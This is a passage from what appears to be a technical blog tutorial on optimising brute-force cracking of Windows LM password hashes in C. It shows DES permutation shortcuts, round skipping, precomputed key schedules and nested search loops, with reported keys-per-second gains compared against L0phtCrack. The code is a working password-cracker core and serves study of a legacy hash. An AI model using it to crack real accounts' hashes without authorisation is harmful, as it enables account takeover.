It was simply cheaper to change the specification and it’s widely accepted this additional process does not affect security of the cipher in any way. It is akin to a modern block cipher such as NOEKEON or SM4 that converts the plaintext to big-endian on little-endian machines. As you can see from the code below, it requires a lot of operations. By removing the permutation for both the plaintext and ciphertext, there is a significant increase in the speed of recovery.

#define ROTATE(a,n)(((a)>>(n))+((a)<<(32-(n))))

#define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
        (b)^=(t),\
        (a)^=((t)<<(n)))

#define IP(l,r) \
        { \
        register uint32_t tt; \
        PERM_OP(r,l,tt, 4,0x0f0f0f0fL); \
        PERM_OP(l,r,tt,16,0x0000ffffL); \
        PERM_OP(r,l,tt, 2,0x33333333L); \
        PERM_OP(l,r,tt, 8,0x00ff00ffL); \
        PERM_OP(r,l,tt, 1,0x55555555L); \
        }
        
    // perform initial permutation on ciphertext/hash
    h[0] = c->hash.w[0];
    h[1] = c->hash.w[1];
    IP(h[0], h[1]);
    h[0] = ROTATE(h[0], 29) & 0xffffffffL;
    h[1] = ROTATE(h[1], 29) & 0xffffffffL;

The plaintext KGS!@#$% in its hexadecimal representation is 0x4B47532140232425. Once the initial permutation has been applied, we end up with 0xAA1907472400B807 that gets loaded into L and R before applying each round of encryption.

10. Skipping Rounds

We can safely skip the last round of encryption by first checking the result of L with half of the LM hash we are trying to crack. If they are equal, only then do we apply the last round and check R.

                  // permuted plaintext
                  r = 0x2400B807; l = 0xAA190747;

                  k = (uint32_t*)&ks[0];

                  // encrypt
                  DES_F(l, r,  0); DES_F(r, l,  2);
                  DES_F(l, r,  4); DES_F(r, l,  6);     
                  DES_F(l, r,  8); DES_F(r, l, 10);    
                  DES_F(l, r, 12); DES_F(r, l, 14);   
                  DES_F(l, r, 16); DES_F(r, l, 18);    
                  DES_F(l, r, 20); DES_F(r, l, 22);    
                  DES_F(l, r, 24); DES_F(r, l, 26);    
                  DES_F(l, r, 28);   

                  c->complete++;

                  // do we have one half of the LM hash?
                  if (h[0] == l) {
                    // apply the last round
                    DES_F(r, l, 30);
                    // do we have the full hash?
                    if (h[1] == r) {
                      // ok, we found the key
                      c->found = true;
                      return true;
                    }
                  }

11. Version 3

Note how the key schedule buffers are aligned by 32 bytes. This is to enable using AVX2.

static bool crack_lm3(void *param) {
    uint32_t         h[2], l, r, t, u, *k;
    DES_key_schedule ks_tbl[7][256] __attribute__ ((aligned(32)));
    DES_key_schedule ks[7]          __attribute__ ((aligned(32)));
    crack_opt_t      *c=(crack_opt_t*)param;
    
    // precompute key schedules for alphabet
    DES_init_keys2(c->alphabet, ks_tbl);
        
    // perform initial permutation on ciphertext/hash
    h[0] = c->hash.w[0];
    h[1] = c->hash.w[1];
    IP(h[0], h[1]);
    h[0] = ROTATE(h[0], 29) & 0xffffffffL;
    h[1] = ROTATE(h[1], 29) & 0xffffffffL;

    // set the initial key schedules based on pwd_idx
    for (int i=7; i>0; i--) {
      // if not set, skip it
      if (c->pwd_idx[i-1] == ~0UL) continue;
      // set key schedule for this index
      DES_SET_KEY(i);
    }

    goto compute_lm;

    do {
      DES_SET_KEY(7);
      do {
        DES_SET_KEY(6);
        do {
          DES_SET_KEY(5);
          do {
            DES_SET_KEY(4);
            do {
              DES_SET_KEY(3);
              do {
                DES_SET_KEY(2);
                do {
                  DES_SET_KEY(1);
compute_lm:
                  // permuted plaintext
                  r = 0x2400B807; l = 0xAA190747;

                  k = (uint32_t*)&ks[0];

                  // encrypt
                  DES_F(l, r,  0); DES_F(r, l,  2);
                  DES_F(l, r,  4); DES_F(r, l,  6);     
                  DES_F(l, r,  8); DES_F(r, l, 10);    
                  DES_F(l, r, 12); DES_F(r, l, 14);   
                  DES_F(l, r, 16); DES_F(r, l, 18);    
                  DES_F(l, r, 20); DES_F(r, l, 22);    
                  DES_F(l, r, 24); DES_F(r, l, 26);    
                  DES_F(l, r, 28);   

                  c->complete++;

                  // do we have one half of the LM hash?
                  if (h[0] == l) {
                    // apply the last round
                    DES_F(r, l, 30);
                    // do we have the full hash?
                    if (h[1] == r) {
                      // ok, we found the key
                      c->found = true;
                      return true;
                    }
                  }

                  if (--c->total_cbn == 0) return false;
                  if (c->stopped) return false;

                } while (++c->pwd_idx[0] < c->alpha_len);
                c->pwd_idx[0] = 0;
              } while (++c->pwd_idx[1] < c->alpha_len);
              c->pwd_idx[1] = 0;
            } while (++c->pwd_idx[2] < c->alpha_len);
            c->pwd_idx[2] = 0;
          } while (++c->pwd_idx[3] < c->alpha_len);
          c->pwd_idx[3] = 0;
        } while (++c->pwd_idx[4] < c->alpha_len);
        c->pwd_idx[4] = 0;
      } while (++c->pwd_idx[5] < c->alpha_len);
      c->pwd_idx[5] = 0;
    } while (++c->pwd_idx[6] < c->alpha_len);
    return false;
}

Now we’re talking! Over 3.5 million keys per second more than version 2.

12. Precomputing Key Schedules 2

Our final optimization in C is the precomputation of key schedules for all 2-byte passwords and storing them in memory. For the alphabet A-Z, this requires 86,528 bytes of RAM. 69 characters would require 609,408 bytes of RAM. For devices that perform better with large blocks of memory, one might consider precomputing key schedules for all 3-byte passwords depending on the circumstances. Worst case scenario for 3-byte passwords is around 42MB. I’ve not tried using this amount, but it might be worth researching.

    // create key schedules for every two character password
    for(i=0;i<c->alpha_len;i++) {
      memset(pwd, 0, sizeof(pwd));
      pwd[0] = c->alphabet[i];

      for(j=0;j<c->alpha_len;j++) {
        pwd[1] = c->alphabet[j];
        DES_str_to_key((char*)pwd, (uint8_t*)&key);
        DES_set_key(&key, p);
        p++;
      }
    }

The F round is also changed to factor in the 2-byte key schedules. k1 points to the key schedule for bytes 3-7 while k2 points to the key schedules for every 2-byte combination.

#define LOAD_DATA_tmp(a,b,c,d,e,f) LOAD_DATA(a,b,c,d,e,f,g)
#define LOAD_DATA(R,S,u,t,E0,E1,tmp) \
        u=R^(k1[S  ] | k2[S  ]); \
        t=R^(k1[S+1] | k2[S+1]);

#define DES_F(LL,R,S) {\
        LOAD_DATA_tmp(R,S,u,t,E0,E1); \
        t=ROTATE(t,4); \
        LL^=DES_sbox[0][(u>> 2L)&0x3f]^ \
            DES_sbox[2][(u>>10L)&0x3f]^ \
            DES_sbox[4][(u>>18L)&0x3f]^ \
            DES_sbox[6][(u>>26L)&0x3f]^ \
            DES_sbox[1][(t>> 2L)&0x3f]^ \
            DES_sbox[3][(t>>10L)&0x3f]^ \
            DES_sbox[5][(t>>18L)&0x3f]^ \
            DES_sbox[7][(t>>26L)&0x3f]; }

13. Version 4

cbn contains the length of the alphabet squared. For [A,Z], that’s 26^{2} or 676 combinations. By keeping the code inside the CPU cache longer, this helps improve performance.

    k1 = (uint32_t*)&ks1[2];
    k2 = (uint32_t*)&ks2[0];
    
    k2 += ((c->pwd_idx[0] * c->alpha_len) + c->pwd_idx[1]) * 32;
    cbn = c->alpha_len * c->alpha_len;
    
    goto compute_lm;

    do {
      DES_SET_KEY(7);
      do {
        DES_SET_KEY(6);
        do {
          DES_SET_KEY(5);
          do {
            DES_SET_KEY(4);
            do {
              DES_SET_KEY(3);
              k2 = (uint32_t*)&ks2[0];
compute_lm:
              for(i=0;i<cbn;i++) {
                // permuted plaintext
                r = 0x2400B807; l = 0xAA190747;

                // encrypt
                DES_F(l, r,  0); 
                DES_F(r, l,  2); DES_F(l, r,  4); 
                DES_F(r, l,  6); DES_F(l, r,  8); 
                DES_F(r, l, 10); DES_F(l, r, 12); 
                DES_F(r, l, 14); DES_F(l, r, 16); 
                DES_F(r, l, 18); DES_F(l, r, 20); 
                DES_F(r, l, 22); DES_F(l, r, 24); 
                DES_F(r, l, 26); DES_F(l, r, 28); 
                
                if (h[0] == l) {
                  DES_F(r, l, 30);
                  if (h[1] == r) {
                    // yay, we found it.
                    c->pwd_idx[0] = (i / c->alpha_len);
                    c->pwd_idx[1] = (i % c->alpha_len);
                    c->found = true;
                    return true;
                  }
                }
                k2+=32;
              }
              c->complete += cbn;
              c->total_cbn -= cbn;
              if ((int64_t)c->total_cbn<0) return false;
              if (c->stopped) return false;
                
            } while (++c->pwd_idx[2] < c->alpha_len);
            c->pwd_idx[2] = 0;
          } while (++c->pwd_idx[3] < c->alpha_len);
          c->pwd_idx[3] = 0;
        } while (++c->pwd_idx[4] < c->alpha_len);
        c->pwd_idx[4] = 0;
      } while (++c->pwd_idx[5] < c->alpha_len);
      c->pwd_idx[5] = 0;
    } while (++c->pwd_idx[6] < c->alpha_len);
    return false;

We see a modest increase in speed for a single thread, but this will make more of a difference in multithreaded mode. This time we have 8.64 million keys per second.

14. Results

Here are all four routines running one after the other using multiple threads.

We achieve a 300% speed increase, but that’s significantly less than the 450% gain advertised by L0phtCrack twenty years ago. The only explanation I can think of at this point is that optimizers for compilers 22 years ago were not as good as they are today. Well written assembler routines would increase the speed further, but not by that much IMHO. What I’ve shown here may not be exactly how the L0pht did it, but i’d say it’s probably close enough.

Source code

Posted in cryptography, passwords, programming, security, windows | Tagged , , , , | Leave a comment